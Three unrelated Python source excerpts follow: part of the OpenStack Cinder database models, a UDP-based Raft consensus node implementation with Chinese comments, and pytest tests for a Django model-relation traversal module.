__tablename__ = 'cgsnapshots'
id = Column(String(36), primary_key=True)
consistencygroup_id = Column(String(36))
user_id = Column(String(255), nullable=False)
project_id = Column(String(255), nullable=False)
name = Column(String(255))
description = Column(String(255))
status = Column(String(255))
consistencygroup = relationship(
ConsistencyGroup,
backref="cgsnapshots",
foreign_keys=consistencygroup_id,
primaryjoin='Cgsnapshot.consistencygroup_id == ConsistencyGroup.id')
class Volume(BASE, CinderBase):
"""Represents a block storage device that can be attached to a vm."""
__tablename__ = 'volumes'
id = Column(String(36), primary_key=True)
_name_id = Column(String(36)) # Don't access/modify this directly!
@property
def name_id(self):
return self.id if not self._name_id else self._name_id
@name_id.setter
def name_id(self, value):
self._name_id = value
@property
def name(self):
return CONF.volume_name_template % self.name_id
ec2_id = Column(Integer)
user_id = Column(String(255))
project_id = Column(String(255))
snapshot_id = Column(String(36))
host = Column(String(255)) # , ForeignKey('hosts.id'))
size = Column(Integer)
availability_zone = Column(String(255)) # TODO(vish): foreign key?
instance_uuid = Column(String(36))
attached_host = Column(String(255))
mountpoint = Column(String(255))
attach_time = Column(String(255)) # TODO(vish): datetime
status = Column(String(255)) # TODO(vish): enum?
attach_status = Column(String(255)) # TODO(vish): enum
migration_status = Column(String(255))
scheduled_at = Column(DateTime)
launched_at = Column(DateTime)
terminated_at = Column(DateTime)
display_name = Column(String(255))
display_description = Column(String(255))
provider_location = Column(String(255))
provider_auth = Column(String(255))
provider_geometry = Column(String(255))
provider_id = Column(String(255))
volume_type_id = Column(String(36))
source_volid = Column(String(36))
encryption_key_id = Column(String(36))
consistencygroup_id = Column(String(36))
deleted = Column(Boolean, default=False)
bootable = Column(Boolean, default=False)
replication_status = Column(String(255))
replication_extended_status = Column(String(255))
replication_driver_data = Column(String(255))
consistencygroup = relationship(
ConsistencyGroup,
backref="volumes",
foreign_keys=consistencygroup_id,
primaryjoin='Volume.consistencygroup_id == ConsistencyGroup.id')
class VolumeMetadata(BASE, CinderBase):
"""Represents a metadata key/value pair for a volume."""
__tablename__ = 'volume_metadata'
id = Column(Integer, primary_key=True)
key = Column(String(255))
value = Column(String(255))
volume_id = Column(String(36), ForeignKey('volumes.id'), nullable=False)
volume = relationship(Volume, backref="volume_metadata",
foreign_keys=volume_id,
primaryjoin='and_('
'VolumeMetadata.volume_id == Volume.id,'
'VolumeMetadata.deleted == False)')
class VolumeAdminMetadata(BASE, CinderBase):
"""Represents an administrator metadata key/value pair for a volume."""
__tablename__ = 'volume_admin_metadata'
id = Column(Integer, primary_key=True)
key = Column(String(255))
value = Column(String(255))
volume_id = Column(String(36), ForeignKey('volumes.id'), nullable=False)
volume = relationship(Volume, backref="volume_admin_metadata",
foreign_keys=volume_id,
primaryjoin='and_('
'VolumeAdminMetadata.volume_id == Volume.id,'
'VolumeAdminMetadata.deleted == False)')
class VolumeTypes(BASE, CinderBase):
"""Represent possible volume_types of volumes offered."""
__tablename__ = "volume_types"
id = Column(String(36), primary_key=True)
name = Column(String(255))
description = Column(String(255))
# A reference to qos_specs entity
qos_specs_id = Column(String(36),
ForeignKey('quality_of_service_specs.id'))
is_public = Column(Boolean, default=True)
volumes = relationship(Volume,
backref=backref('volume_type', uselist=False),
foreign_keys=id,
primaryjoin='and_('
'Volume.volume_type_id == VolumeTypes.id, '
'VolumeTypes.deleted == False)')
class VolumeTypeProjects(BASE, CinderBase):
"""Represent projects associated volume_types."""
__tablename__ = "volume_type_projects"
__table_args__ = (schema.UniqueConstraint(
"volume_type_id", "project_id", "deleted",
name="uniq_volume_type_projects0volume_type_id0project_id0deleted"),
)
id = Column(Integer, primary_key=True)
volume_type_id = Column(Integer, ForeignKey('volume_types.id'),
nullable=False)
project_id = Column(String(255))
volume_type = relationship(
VolumeTypes,
backref="projects",
foreign_keys=volume_type_id,
primaryjoin='and_('
'VolumeTypeProjects.volume_type_id == VolumeTypes.id,'
'VolumeTypeProjects.deleted == False)')
class VolumeTypeExtraSpecs(BASE, CinderBase):
"""Represents additional specs as key/value pairs for a volume_type."""
__tablename__ = 'volume_type_extra_specs'
id = Column(Integer, primary_key=True)
key = Column(String(255))
value = Column(String(255))
volume_type_id = Column(String(36),
ForeignKey('volume_types.id'),
nullable=False)
volume_type = relationship(
VolumeTypes,
backref="extra_specs",
foreign_keys=volume_type_id,
primaryjoin='and_('
'VolumeTypeExtraSpecs.volume_type_id == VolumeTypes.id,'
'VolumeTypeExtraSpecs.deleted == False)'
)
class QualityOfServiceSpecs(BASE, CinderBase):
"""Represents QoS specs as key/value pairs.
QoS specs is standalone entity that can be associated/disassociated
with volume types (one to many relation). Adjacency list relationship
pattern is used in this model in order to represent following hierarchical
data with in flat table, e.g, following structure
qos-specs-1 'Rate-Limit'
|
+------> consumer = 'front-end'
+------> total_bytes_sec = 1048576
+------> total_iops_sec = 500
qos-specs-2 'QoS_Level1'
|
+------> consumer = 'back-end'
+------> max-iops = 1000
+------> min-iops = 200
is represented by:
id specs_id key value
------ -------- ------------- -----
UUID-1 NULL QoSSpec_Name Rate-Limit
UUID-2 UUID-1 consumer front-end
UUID-3 UUID-1 total_bytes_sec 1048576
UUID-4 UUID-1 total_iops_sec 500
UUID-5 NULL QoSSpec_Name QoS_Level1
UUID-6 UUID-5 consumer back-end
UUID-7 UUID-5 max-iops 1000
UUID-8 UUID-5 min-iops 200
"""
__tablename__ = 'quality_of_service_specs'
id = Column(String(36), primary_key=True)
specs_id = Column(String(36), ForeignKey(id))
key = Column(String(255))
value = Column(String(255))
specs = relationship(
"QualityOfServiceSpecs",
cascade="all, delete-orphan",
backref=backref("qos_spec", remote_side=id),
)
vol_types = relationship(
VolumeTypes,
backref=backref('qos_specs'),
foreign_keys=id,
primaryjoin='and_('
'or_(VolumeTypes.qos_specs_id == '
'QualityOfServiceSpecs.id,'
'VolumeTypes.qos_specs_id == '
'QualityOfServiceSpecs.specs_id),'
'QualityOfServiceSpecs.deleted == False)')
class VolumeGlanceMetadata(BASE, CinderBase):
"""Glance metadata for a bootable volume."""
__tablename__ = 'volume_glance_metadata'
id = Column(Integer, primary_key=True, nullable=False)
volume_id = Column(String(36), ForeignKey('volumes.id'))
snapshot_id = Column(String(36), ForeignKey('snapshots.id'))
key = Column(String(255))
value = Column(Text)
volume = relationship(Volume, backref="volume_glance_metadata",
foreign_keys=volume_id,
primaryjoin='and_('
'VolumeGlanceMetadata.volume_id == Volume.id,'
'VolumeGlanceMetadata.deleted == False)')
class Quota(BASE, CinderBase):
"""Represents a single quota override for a project.
If there is no row for a given project id and resource, then the
default for the quota class is used. If there is no row for a
given quota class and resource, then the default for the
deployment is used. If the row is present but the hard limit is
Null, then the resource is unlimited.
"""
__tablename__ = 'quotas'
id = Column(Integer, primary_key=True)
project_id = Column(String(255), index=True)
resource = Column(String(255))
hard_limit = Column(Integer, nullable=True)
class QuotaClass(BASE, CinderBase):
"""Represents a single quota override for a quota class.
If there is no row for a given quota class and resource, then the
default for the deployment is used. If the row is present but the
hard limit is Null, then the resource is unlimited.
"""
__tablename__ = 'quota_classes'
id = Column(Integer, primary_key=True)
class_name = Column(String(255), index=True)
resource = Column(String(255))
hard_limit = Column(Integer, nullable=True)
class QuotaUsage(BASE, CinderBase):
"""Represents the current usage for a given resource."""
__tablename__ = 'quota_usages'
id = Column(Integer, primary_key=True)
project_id = Column(String(255), index=True)
resource = Column(String(255))
in_use = Column(Integer)
reserved = Column(Integer)
@property
def total(self):
return self.in_use + self.reserved
until_refresh = Column(Integer, nullable=True)
class Reservation(BASE, CinderBase):
"""Represents a resource reservation for quotas."""
__tablename__ = 'reservations'
id = Column(Integer, primary_key=True)
uuid = Column(String(36), nullable=False)
usage_id = Column(Integer, ForeignKey('quota_usages.id'), nullable=False)
project_id = Column(String(255), index=True)
resource = Column(String(255))
delta = Column(Integer)
expire = Column(DateTime, nullable=False)
usage = relationship(
"QuotaUsage",
foreign_keys=usage_id,
primaryjoin='and_(Reservation.usage_id == QuotaUsage.id,'
'QuotaUsage.deleted == 0)')
class Snapshot(BASE, CinderBase):
"""Represents a snapshot of volume."""
__tablename__ = 'snapshots'
id = Column(String(36), primary_key=True)
@property
def name(self):
return CONF.snapshot_name_template % self.id
@property
def volume_name(self):
return self.volume.name # pylint: disable=E1101
user_id = Column(String(255))
project_id = Column(String(255))
volume_id = Column(String(36))
cgsnapshot_id = Column(String(36))
status = Column(String(255))
progress = Column(String(255))
volume_size = Column(Integer)
display_name = Column(String(255))
display_description = Column(String(255))
encryption_key_id = Column(String(36))
volume_type_id = Column(String(36))
provider_location = Column(String(255))
provider_id = Column(String(255))
volume = relationship(Volume, backref="snapshots",
foreign_keys=volume_id,
primaryjoin='Snapshot.volume_id == Volume.id')
cgsnapshot = relationship(
Cgsnapshot,
backref="snapshots",
foreign_keys=cgsnapshot_id,
primaryjoin='Snapshot.cgsnapshot_id == Cgsnapshot.id')
class SnapshotMetadata(BASE, CinderBase):
"""Represents a metadata key/value pair for a snapshot."""
__tablename__ = 'snapshot_metadata'
id = Column(Integer, primary_key=True)
key = Column(String(255))
value = Column(String(255))
snapshot_id = Column(String(36),
ForeignKey('snapshots.id'),
nullable=False)
snapshot = relationship(Snapshot, backref="snapshot_metadata",
| |
# coding: utf-8
import os
import json
import time
import socket
import random
import logging
import requests
from log import Log
# logging这一行设置logging.info也可以输出到控制台
logging.basicConfig(level=logging.WARN, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# 4 actions after receive an message:
# 1. all_do(data): 所有的role都要做
# 2. leader_do(data)
# 3. candidate_do(data)
# 4. follower_do(data)
class Node(object):
def __init__(self, conf):
self.role = 'follower'
self.id = conf['id']
self.addr = conf['addr']
self.peers = conf['peers']
# persistent state
self.current_term = 0
self.voted_for = None
if not os.path.exists(self.id):
os.mkdir(self.id)
# init persistent state
self.load()
self.log = Log(self.id)
# volatile state
# rule 1, 2
self.commit_index = 0
self.last_applied = 0
# volatile state on leaders
# rule 1, 2
self.next_index = {_id: self.log.last_log_index + 1 for _id in self.peers}
self.match_index = {_id: -1 for _id in self.peers}
# append entries
self.leader_id = None
# request vote
self.vote_ids = {_id: 0 for _id in self.peers}
# client request
self.client_addr = None
# tick
self.wait_ms = (10, 20)
self.next_leader_election_time = time.time() + random.randint(*self.wait_ms)
self.next_heartbeat_time = 0
# ss is used to receive
self.ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.ss.bind(self.addr)
self.ss.settimeout(2)
# cs is used to send ,cs is only used in 'send(self,msg,addr)' function
self.cs = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# lead_req_socket is used to accept lead election requests from other nodes.
#lead_req_addr = (self.addr[0], 10002)
#self.lead_req_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#self.lead_req_socket.bind(lead_req_addr)
# lead_res_socket is used to send respond to other nodes.
#self.lead_res_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def load(self):
# 记载保存到本地的结果,如果没有(第一次运行服务器)就创建一个
# load值在init中被调用
file_path = self.id + '/key.json'
if os.path.exists(file_path):
with open(file_path, 'r') as f:
data = json.load(f)
self.current_term = data['current_term']
self.voted_for = data['voted_for']
else:
self.save()
def save(self):
data = {'current_term': self.current_term,
'voted_for': self.voted_for,
}
file_path = self.id + '/key.json'
with open(file_path, 'w') as f:
json.dump(data, f)
def send(self, msg, addr):
msg = json.dumps(msg).encode('utf-8')
self.cs.sendto(msg, addr)
def recv(self):
# recv self.ss 获取所有发送来的data信息,data格式都是固定的 dictionary的格式
# recvfrom(65535) 是因为The maximum amount of data that can be received is 65535 bytes.
msg, addr = self.ss.recvfrom(65535)
return json.loads(msg), addr
def redirect(self, data, addr):
# 重定向,follower接收到来自client的要重定向给leader来处理。
if data == None:
return None
if data['type'] == 'client_append_entries':
if self.role != 'leader':
if self.leader_id:
logging.info('redirect: client_append_entries to leader')
self.send(data, self.peers[self.leader_id])
return None
else:
self.client_addr = addr
return data
if data['dst_id'] != self.id:
#logging.info('redirect: to ' + data['dst_id']) #Can Only concatenate str (not "tuple") to str.
# logging.info('redirec to leader')
self.send(data, self.peers[data['dst_id']])
return None
else:
return data
return data
def append_entries(self, data):
'''
append entries rpc
only used in follower state
'''
''''
Leader选举出来后,就可以开始处理客户端请求。Leader收到客户端请求后,将请求内容作为一条log日志添加到自己的log记录中,
并向其它server发送append_entrie(添加日志)请求。其它server收到append_entries请求后,判断该append请求满足接收条件,
如果满足条件就将其添加到本地的log中,并给Leader发送添加成功的response。Leader在收到大多数server添加成功的response后,
就将该条log正式提交。提交后的log日志就意味着已经被raft系统接受,并能应用到状态机中了。
'''
response = {'type': 'append_entries_response',
'src_id': self.id,
'dst_id': data['src_id'],
'term': self.current_term,
'success': False
}
'''1
如果不符合接收条件
'''
if data['term'] < self.current_term:
logging.info(' 2. smaller term')
logging.info(' 3. success = False: smaller term')
logging.info(' 4. send append_entries_response to leader ' + data['src_id'])
response['success'] = False
self.send(response, self.peers[data['src_id']])
return
self.leader_id = data['leader_id']
# heartbeat
if data['entries'] == []:
logging.info(' 4. heartbeat')
return
prev_log_index = data['prev_log_index']
prev_log_term = data['prev_log_term']
tmp_prev_log_term = self.log.get_log_term(prev_log_index)
# append_entries: rule 2, 3
# append_entries: rule 3
if tmp_prev_log_term != prev_log_term:
logging.info(' 4. success = False: index not match or term not match')
logging.info(' 5. send append_entries_response to leader ' + data['src_id'])
logging.info(' 6. log delete_entries')
logging.info(' 6. log save')
response['success'] = False
self.send(response, self.peers[data['src_id']])
self.log.delete_entries(prev_log_index)
# append_entries rule 4
else:
logging.info(' 4. success = True')
logging.info(' 5. send append_entries_response to leader ' + data['src_id'])
logging.info(' 6. log append_entries')
logging.info(' 7. log save')
response['success'] = True
self.send(response, self.peers[data['src_id']])
self.log.append_entries(prev_log_index, data['entries'])
# append_entries rule 5
leader_commit = data['leader_commit']
if leader_commit > self.commit_index:
commit_index = min(leader_commit, self.log.last_log_index)
self.commit_index = commit_index
logging.info(' 8. commit_index = ' + str(commit_index))
return
def request_vote(self, data):
'''
request vote rpc
only used in follower state
'''
response = {'type': 'request_vote_response',
'src_id': self.id,
'dst_id': data['src_id'],
'term': self.current_term,
'vote_granted': False
}
# request vote: rule 1
if data['term'] < self.current_term:
logging.info(' 2. smaller term')
logging.info(' 3. success = False')
logging.info(' 4. send request_vote_response to candidate ' + data['src_id'])
response['vote_granted'] = False
self.send(response, self.peers[data['src_id']])
return
logging.info(' 2. same term')
candidate_id = data['candidate_id']
last_log_index = data['last_log_index']
last_log_term = data['last_log_term']
if self.voted_for == None or self.voted_for == candidate_id:
if last_log_index >= self.log.last_log_index and last_log_term >= self.log.last_log_term:
self.voted_for = data['src_id']
self.save()
response['vote_granted'] = True
self.send(response, self.peers[data['src_id']])
logging.info(' 3. success = True: candidate log is newer')
logging.info(' 4. send request_vote_response to candidate ' + data['src_id'])
else:
self.voted_for = None
self.save()
response['vote_granted'] = False
self.send(response, self.peers[data['src_id']])
logging.info(' 3. success = False: candidate log is older')
logging.info(' 4. send request_vote_response to candidate ' + data['src_id'])
else:
response['vote_granted'] = False
self.send(response, self.peers[data['src_id']])
logging.info(' 3. success = False: has vated for ' + self.voted_for)
logging.info(' 4. send request_vote_response to candidate ' + data['src_id'])
return
def all_do(self, data):
'''
all servers: rule 1, 2
'''
logging.info('-------------------------------all------------------------------------------')
if self.commit_index > self.last_applied:
self.last_applied = self.commit_index
logging.info('all: 1. last_applied = ' + str(self.last_applied))
if data == None:
return
if data['type'] == 'client_append_entries':
return
if data['term'] > self.current_term:
logging.info('all: 1. bigger term')
logging.info(' 2. become follower')
self.role = 'follower'
self.current_term = data['term']
self.voted_for = None
self.save()
if data['type'] == 'request_leader':
print("Client Asking who is leader")
res_data = {'ip': self.peers[self.leader_id]}
self.send(res_data, self.client_addr)
return
def follower_do(self, data):
'''
rules for servers: follower
'''
logging.info('-------------------------------follower-------------------------------------')
t = time.time()
# follower rules: rule 1
if data != None:
if data['type'] == 'append_entries':
logging.info('follower: 1. recv append_entries from leader ' + data['src_id'])
if data['term'] == self.current_term:
logging.info(' 2. same term')
logging.info(' 3. reset next_leader_election_time')
self.next_leader_election_time = t + random.randint(*self.wait_ms)
self.append_entries(data)
elif data['type'] == 'request_vote':
logging.info('follower: 1. recv request_vote from candidate ' + data['src_id'])
self.request_vote(data)
# follower rules: rule 2
if t > self.next_leader_election_time:
logging.info('follower:1. become candidate')
self.next_leader_election_time = t + random.randint(*self.wait_ms)
self.role = 'candidate'
self.current_term += 1
self.voted_for = self.id
self.save()
self.vote_ids = {_id: 0 for _id in self.peers}
return
def candidate_do(self, data):
'''
rules for fervers: candidate
'''
logging.info('-------------------------------candidate------------------------------------')
t = time.time()
# candidate rules: rule 1
for dst_id in self.peers:
if self.vote_ids[dst_id] == 0:
logging.info('candidate: 1. send request_vote to peer ' + dst_id)
request = {
'type': 'request_vote',
'src_id': self.id,
'dst_id': dst_id,
'term': self.current_term,
'candidate_id': self.id,
'last_log_index': self.log.last_log_index,
'last_log_term': self.log.last_log_term
}
# logging.info(request)
self.send(request, self.peers[dst_id])
# if data != None and data['term'] < self.current_term:
# logging.info('candidate: 1. smaller term from ' + data['src_id'])
# logging.info(' 2. ignore')
# return
if data != None and data['term'] == self.current_term:
# candidate rules: rule 2
if data['type'] == 'request_vote_response':
logging.info('candidate: 1. recv request_vote_response from follower ' + data['src_id'])
self.vote_ids[data['src_id']] = data['vote_granted']
vote_count = sum(list(self.vote_ids.values()))
if vote_count >= len(self.peers)//2:
logging.info(' 2. become leader')
self.role = 'leader'
self.voted_for = None
self.save()
self.next_heartbeat_time = 0
self.next_index = {_id: self.log.last_log_index + 1 for _id in self.peers}
self.match_index = {_id: 0 for _id in self.peers}
return
# candidate rules: rule 3
elif data['type'] == 'append_entries':
logging.info('candidate: 1. recv append_entries from leader ' + data['src_id'])
logging.info(' 2. become follower')
self.next_leader_election_time = t + random.randint(*self.wait_ms)
self.role = 'follower'
self.voted_for = None
self.save()
return
# candidate rules: rule 4
if t > self.next_leader_election_time:
logging.info('candidate: 1. leader_election timeout')
logging.info(' 2. become candidate')
self.next_leader_election_time = t + random.randint(*self.wait_ms)
self.role = 'candidate'
self.current_term += 1
self.voted_for = self.id
self.save()
self.vote_ids = {_id: 0 for _id in self.peers}
return
def leader_do(self, data):
'''
rules for fervers: leader
'''
logging.info('-------------------------------leader---------------------------------------')
# leader rules: rule 1, 3
t = time.time()
if t > self.next_heartbeat_time:
self.next_heartbeat_time = t + random.randint(0, 5)
for dst_id in self.peers:
logging.info('leader:1. send append_entries to peer ' + dst_id)
request = {'type': 'append_entries',
'src_id': self.id,
'dst_id': dst_id,
'term': self.current_term,
'leader_id': self.id,
'prev_log_index': self.next_index[dst_id] - 1,
'prev_log_term': self.log.get_log_term(self.next_index[dst_id] - 1),
'entries': self.log.get_entries(self.next_index[dst_id]),
'leader_commit': self.commit_index
}
self.send(request, self.peers[dst_id])
# leader rules: rule 2
if data != None and data['type'] == 'client_append_entries':
data['term'] = self.current_term
self.log.append_entries(self.log.last_log_index, [data])
logging.info('leader:1. recv append_entries from client')
logging.info(' 2. log append_entries')
logging.info(' 3. log save')
return
# leader rules: rule 3.1, 3.2
if data != None and data['term'] == self.current_term:
if data['type'] == 'append_entries_response':
logging.info('leader:1. recv append_entries_response from follower ' + data['src_id'])
if data['success'] == False:
self.next_index[data['src_id']] -= 1
logging.info(' 2. success = False')
logging.info(' 3. next_index - 1')
else:
self.match_index[data['src_id']] = | |
<filename>django/sierra/sierra/tests/test_relationtrees.py
"""
Tests the relationtrees module used in custom sierra management commands.
"""
import pytest
from testmodels import models as m
from sierra.management import relationtrees
# FIXTURES AND TEST DATA
pytestmark = pytest.mark.django_db
BAD_RELATION_PARAMS = {
'Invalid model': ('invalid', 'fieldname'),
'Invalid fieldname': (m.EndNode, 'invalid'),
'Fieldname is not a relation': (m.EndNode, 'name'),
}
RELATION_PARAMS = {
'ReferenceNode to EndNode': (m.ReferenceNode, 'end'),
'ReferenceNode to ThroughNode': (m.ReferenceNode, 'throughnode_set'),
'ReferenceNode to ManyToManyNode': (m.ReferenceNode, 'm2m'),
'ReferenceNode to SelfReferentialNode': (m.ReferenceNode, 'srn'),
'ReferenceNode to OneToOneNode': (m.ReferenceNode, 'one'),
'ThroughNode to ReferenceNode': (m.ThroughNode, 'ref'),
'ThroughNode to ManyToManyNode': (m.ThroughNode, 'm2m'),
'ManyToManyNode to ThroughNode': (m.ManyToManyNode, 'throughnode_set'),
'ManyToManyNode to EndNode': (m.ManyToManyNode, 'end'),
'ManyToManyNode to ReferenceNode':
(m.ManyToManyNode, 'referencenode_set'),
'EndNode to ReferenceNode': (m.EndNode, 'referencenode_set'),
'EndNode to ManyToManyNode': (m.EndNode, 'manytomanynode_set'),
'EndNode to SelfReferentialNode':
(m.EndNode, 'selfreferentialnode_set'),
'OneToOneNode to ReferenceNode': (m.OneToOneNode, 'referencenode'),
'SelfReferentialNode to SelfReferentialNode':
(m.SelfReferentialNode, 'parent'),
'SelfReferentialNode to ReferenceNode':
(m.SelfReferentialNode, 'referencenode_set'),
'SelfReferentialNode to EndNode': (m.SelfReferentialNode, 'end'),
}
BRANCH_PARAMS = {
'ReferenceNode > end': (m.ReferenceNode, ['end']),
'ReferenceNode > one': (m.ReferenceNode, ['one']),
'ReferenceNode > m2m, end': (m.ReferenceNode, ['m2m', 'end']),
'ReferenceNode > throughnode_set, m2m, end':
(m.ReferenceNode, ['throughnode_set', 'm2m', 'end']),
'ReferenceNode > srn, parent, end':
(m.ReferenceNode, ['srn', 'parent', 'end']),
'ThroughNode > ref, one': (m.ThroughNode, ['ref', 'one']),
'ThroughNode > m2m, referencenode_set, end':
(m.ThroughNode, ['m2m', 'referencenode_set', 'end']),
'SelfReferentialNode > referencenode_set, m2m, end':
(m.SelfReferentialNode, ['referencenode_set', 'm2m', 'end']),
'ThroughNode > ref, m2m, end': (m.ThroughNode, ['ref', 'm2m', 'end']),
'EndNode > m2m, ref, end':
(m.EndNode, ['manytomanynode_set', 'referencenode_set', 'end']),
'OneToOneNode > referencenode, m2m, end':
(m.OneToOneNode, ['referencenode', 'm2m', 'end']),
}
TREE_PARAMS = {
'No branches (EndNode)':
(m.EndNode, []),
'Has branches (SelfReferentialNode)':
(m.SelfReferentialNode, [
['referencenode_set', 'one'],
['referencenode_set', 'end'],
['referencenode_set', 'srn', 'end'],
['referencenode_set', 'srn', 'parent', 'end']
])
}
@pytest.fixture
def instname_to_model():
def do_it(inst_name):
nameprefix_to_model = {
'ref': m.ReferenceNode,
'srn': m.SelfReferentialNode,
'end': m.EndNode,
'm2m': m.ManyToManyNode,
'thr': m.ThroughNode,
'one': m.OneToOneNode
}
return nameprefix_to_model[inst_name[:3]]
return do_it
@pytest.fixture
def get_model_instances(instname_to_model):
def do_it(inst_names):
if not isinstance(inst_names, (list, tuple)):
inst_names = [inst_names]
try:
model = instname_to_model(inst_names[0])
except IndexError:
return []
return model.objects.filter(name__in=inst_names).order_by('name')
return do_it
@pytest.fixture
def assert_all_objset_calls():
def do_it(mock, exp_objsets):
calls = mock.call_args_list
actual_objsets = []
for call in calls:
for arg in (list(call[0]) + call[1].values()):
try:
arg[0]._meta
except Exception:
pass
else:
actual_objsets += [sorted([obj for obj in arg],
key=lambda x: x.name)]
for exp_objset in exp_objsets:
expected = [obj for obj in exp_objset]
assert expected in actual_objsets
actual_objsets.remove(expected)
assert actual_objsets == []
return do_it
@pytest.fixture(params=[key for key in BAD_RELATION_PARAMS.keys()])
def make_bad_relation(request):
def do_it():
relationtrees.Relation(*BAD_RELATION_PARAMS[request.param])
return do_it
@pytest.fixture(params=[key for key in RELATION_PARAMS.keys()])
def relation(request):
return relationtrees.Relation(*RELATION_PARAMS[request.param])
@pytest.fixture(scope='module')
def make_branch():
def do_it(model, fnames):
rels = relationtrees.make_relation_chain_from_fieldnames(model, fnames)
return relationtrees.RelationBranch(model, rels)
return do_it
@pytest.fixture(params=[key for key in BRANCH_PARAMS.keys()])
def branch(make_branch, request):
return make_branch(*BRANCH_PARAMS[request.param])
@pytest.fixture(scope='module')
def make_tree(make_branch):
def do_it(model, flists):
branches = [make_branch(model, fl) for fl in flists]
return relationtrees.RelationTree(model, branches)
return do_it
@pytest.fixture(params=[key for key in TREE_PARAMS.keys()])
def tree(make_tree, request):
return make_tree(*TREE_PARAMS[request.param])
@pytest.fixture
def all_trees(make_tree):
return {k: make_tree(*v) for k, v in TREE_PARAMS.iteritems()}
# TESTS
@pytest.mark.bucket
@pytest.mark.parametrize('oldcmps, newcmps', [
([], [m.ReferenceNode, m.EndNode]),
([m.ReferenceNode], [m.ReferenceNode, m.EndNode]),
([m.ReferenceNode, m.EndNode], [m.ReferenceNode, m.EndNode]),
([m.EndNode, m.ReferenceNode], [m.ReferenceNode, m.EndNode]),
([m.ReferenceNode, m.SelfReferentialNode], [m.ReferenceNode, m.EndNode])
], ids=[
'empty bucket',
'one existing compartment, in new compartments',
'old compartments == new compartments',
'old compartments in different order than new compartments',
'one old compartment missing from new compartments'
])
def test_bucket_updatecompartments_updates_correctly(oldcmps, newcmps):
"""
Bucket.update_compartments should correctly update the
`compartments` attribute of the bucket AND should ensure dict
elements for the new compartments exist on the bucket.
"""
bucket = relationtrees.Bucket(oldcmps)
bucket.update_compartments(newcmps)
assert bucket.compartments == newcmps
for newcmp in newcmps:
assert newcmp in bucket
@pytest.mark.bucket
def test_bucket_updatecompartments_doesnt_change_data(get_model_instances):
"""
Bucket.update_compartments should not change any existing data.
"""
bucket = relationtrees.Bucket([m.ReferenceNode])
test_instance = get_model_instances('ref0')[0]
bucket.put(test_instance)
bucket.update_compartments([m.EndNode, m.ReferenceNode])
assert len(bucket[m.ReferenceNode]) == 1
assert bucket[m.ReferenceNode][test_instance.pk] == test_instance
@pytest.mark.bucket
@pytest.mark.parametrize('oldcmps, objlists, newcmps', [
([m.ReferenceNode], [['ref0']], [m.ReferenceNode]),
([m.ReferenceNode], [['ref0', 'ref2']], [m.ReferenceNode]),
([m.ReferenceNode, m.EndNode], [['ref0', 'ref1'], ['end0']],
[m.ReferenceNode, m.EndNode]),
([], [['ref0']], [m.ReferenceNode]),
([], [['ref0', 'ref0'], ['ref0']], [m.ReferenceNode]),
], ids=[
'single object',
'multiple objects, same type',
'multiple objects, different types',
'object without an existing compartment',
'duplicate objects'
])
def test_bucket_put_puts_objs_into_compartments(oldcmps, objlists, newcmps,
get_model_instances,
instname_to_model):
"""
Bucket.put should put objects into the correct compartments using
the correct keys; objects should be deduplicated, and compartments
should be added if they don't already exist.
"""
bucket = relationtrees.Bucket(oldcmps)
for objlist in objlists:
bucket.put(get_model_instances(objlist))
assert bucket.compartments == newcmps
for exp_names in objlists:
model = instname_to_model(exp_names[0])
unique_expnames = list(set(exp_names))
actual_names = [obj.name for obj in bucket[model].values()]
assert len(bucket[model]) == len(unique_expnames)
assert all([name in actual_names for name in unique_expnames])
@pytest.mark.bucket
def test_bucket_dump_returns_objs_in_compartment_order(get_model_instances):
"""
Bucket.dump should return a list of objects that have been "put"
into the bucket in compartment and then PK order.
"""
bucket = relationtrees.Bucket([m.EndNode, m.ReferenceNode])
bucket.put(get_model_instances(['ref2', 'ref0']))
bucket.put(get_model_instances(['end0', 'end1', 'end2']))
exp = (list(get_model_instances(['end0', 'end1', 'end2'])) +
list(get_model_instances(['ref0', 'ref2'])))
assert bucket.dump() == exp
@pytest.mark.relation
def test_relation_init_raises_error_on_invalid_data(make_bad_relation):
"""
Relation.__init__ should raise a BadRelation error if the provided
model/fieldname combo is not valid.
"""
with pytest.raises(relationtrees.BadRelation):
make_bad_relation()
@pytest.mark.relation
@pytest.mark.parametrize('relation, m2m, multi, direct', [
('ReferenceNode to OneToOneNode', False, False, True),
('ReferenceNode to EndNode', False, False, True),
('ReferenceNode to ManyToManyNode', True, True, True),
('OneToOneNode to ReferenceNode', False, False, False),
('EndNode to ReferenceNode', False, True, False),
('ManyToManyNode to ReferenceNode', True, True, False)
], ids=[
'direct 1-1',
'direct foreign-key',
'direct m2m',
'indirect 1-1',
'indirect 1-many',
'indirect m2m',
], indirect=['relation'])
def test_relation_isattrs_return_right_bools(relation, m2m, multi, direct):
"""
All "is" attributes on Relation objects should return the correct
truth values for the type of relation that is represented.
"""
assert relation.is_m2m == m2m
assert relation.is_multi == multi
assert relation.is_direct == direct
@pytest.mark.relation
@pytest.mark.parametrize('relation, target', [
('ReferenceNode to OneToOneNode', m.OneToOneNode),
('ReferenceNode to SelfReferentialNode', m.SelfReferentialNode),
('ReferenceNode to ManyToManyNode', m.ManyToManyNode),
('OneToOneNode to ReferenceNode', m.ReferenceNode),
('EndNode to ReferenceNode', m.ReferenceNode),
('ManyToManyNode to ReferenceNode', m.ReferenceNode)
], ids=[
'direct 1-1',
'direct foreign-key',
'direct m2m',
'indirect 1-1',
'indirect 1-many',
'indirect m2m',
], indirect=['relation'])
def test_relation_targetmodel_has_right_model(relation, target):
"""
Relation.target_model should contain whatever model is on the other
end of the relation relative to Relation.model.
"""
assert relation.target_model == target
@pytest.mark.relation
@pytest.mark.parametrize('relation, exp', [
('ReferenceNode to ManyToManyNode',
['ReferenceNode to ThroughNode', 'ThroughNode to ManyToManyNode']),
('ManyToManyNode to ReferenceNode',
['ManyToManyNode to ThroughNode', 'ThroughNode to ReferenceNode'])
], ids=[
'direct m2m',
'indirect m2m'
], indirect=['relation'])
def test_relation_getasthroughrelations_m2m_returns_expected(relation, exp):
"""
Relation.get_as_through_relations should return the expected list
of Relation objects, if the relationship is many-to-many.
"""
exp_objs = [relationtrees.Relation(*RELATION_PARAMS[exp[0]]),
relationtrees.Relation(*RELATION_PARAMS[exp[1]])]
result = relation.get_as_through_relations()
